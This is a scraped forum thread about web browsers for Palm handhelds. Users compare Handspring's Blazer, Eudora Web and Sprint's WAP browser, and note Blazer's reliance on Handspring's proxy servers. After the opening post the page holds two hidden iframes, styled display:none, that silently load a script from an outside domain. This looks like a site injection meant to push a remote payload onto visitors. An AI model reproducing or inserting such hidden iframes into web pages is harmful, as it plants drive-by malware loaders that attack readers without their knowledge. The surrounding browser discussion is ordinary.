+ Reply to Thread
    smartphonecentral.com

Web Browsing Solutions

Can someone give their opinion of the various Web browsing solutions available for the Palm platform?

I'm particularly interested in Handspring's Blazer, which sounds like a real-time, fairly fully-functional Web browser. Maybe someone's used the 2.0 beta and would care to comment.

I know there are limitations to hand-held browsers, especially at 160x160. Thanks for your opinions.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

To be honest I have not found one single browser that meets my needs. I am currenly using 3.

I use Blazer 1.1s6 for most web stuff. It does a decent job, but for some reason I can not use it for browing HTTP servers that are not on the internet. If I connect to a customers private network and then try to use Blazer to fire up the web interface for a piece of hardware, the Blazer browser always says it can not connect the server. I know that Blazer uses a proxy to condense the content to improve speed, but there is a setting to not use a proxy server, but that does not seem to help.

I use Eudora Web to connect to the peice of equipment referenced above that I can not use the Blazer browser. It works OK, except it does not handle frames very well.

I also have found that due to the limited 14.4 connection speed, the Sprint WAP browser is great, especially for looking up scores, and things like that. It is quick and efficient. BTW, while I am on the subject of the WAP browser, does anyone know if the WAP (or any WAP) browser can be downloaded. One of the guys I work with ahs a Kyo 6035 and it does not have a WAP browser, and he would like to get one. Any ideas?
    Carl

Administrator

Arrow

carl. is he on sprint? if so, there is the mypalm WAP for sprint folks on the cd....

if hes on verizon, id suggest going to the qcp6035.com site and searching there.. i believe we did a thread on wap browsers for the verizon folks...

RE: blazer 1.1.. do you have the blazer 2.0 bulid 49? the eudora browser does well also... but not as good as blazer IMO...

I think the problem is that Blazer works ONLY through Handspring's proxy servers. Regardless of whether YOU are logged in to a corporate network, Handspring isn't. So their proxy servers can't see it.